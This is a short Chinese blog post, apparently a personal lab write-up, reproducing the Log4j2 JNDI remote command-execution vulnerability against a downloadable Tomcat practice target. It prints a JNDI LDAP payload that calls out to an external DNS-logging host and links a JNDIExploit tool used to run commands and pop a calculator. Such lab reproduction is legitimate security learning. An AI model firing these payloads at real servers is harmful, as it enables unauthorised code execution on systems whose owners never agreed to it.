前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >渗透测试|迟来的Log4j2命令执行简单复现

渗透测试|迟来的Log4j2命令执行简单复现

作者头像
TRY博客-简单的网络技术
发布2022-09-08 11:28:02
5470
发布2022-09-08 11:28:02
举报
文章被收录于专栏:用户7692554的专栏

至少我们曾经在一起过。

来自:一言

var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();

前言

最近很火的漏洞,前几天第一时间复现了,今天发文章记录一下.[aru_13]

探测payload:

${jndi:ldap://dnslog.cn/exp}

靶场在下方下载。

环境搭建

1.首先安装tomcat,直接在web管理端部署靶场的war包即可.

2.部署后直接访问根目录即可看到靶场。

漏洞复现

1.直接输入框输入payload即可进行检测,检测的话用dnslog。

2.直接提交后,如果漏洞存在的话dnslog即可收到请求。

命令执行

1.下载jndi注入工具,目前git上大部分都已经删除,找到一个,希望安全自检:https://github.com/Mr-xn/JNDIExploit-1

启动环境

2.burp抓包进行命令执行回显的测试

命令执行成功

jndi注入工具这边也收到了请求

3.弹出计算器

靶场下载

下载靶场

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-12-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 至少我们曾经在一起过。
    • 前言
      • 环境搭建
        • 漏洞复现
          • 命令执行
            • 靶场下载
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档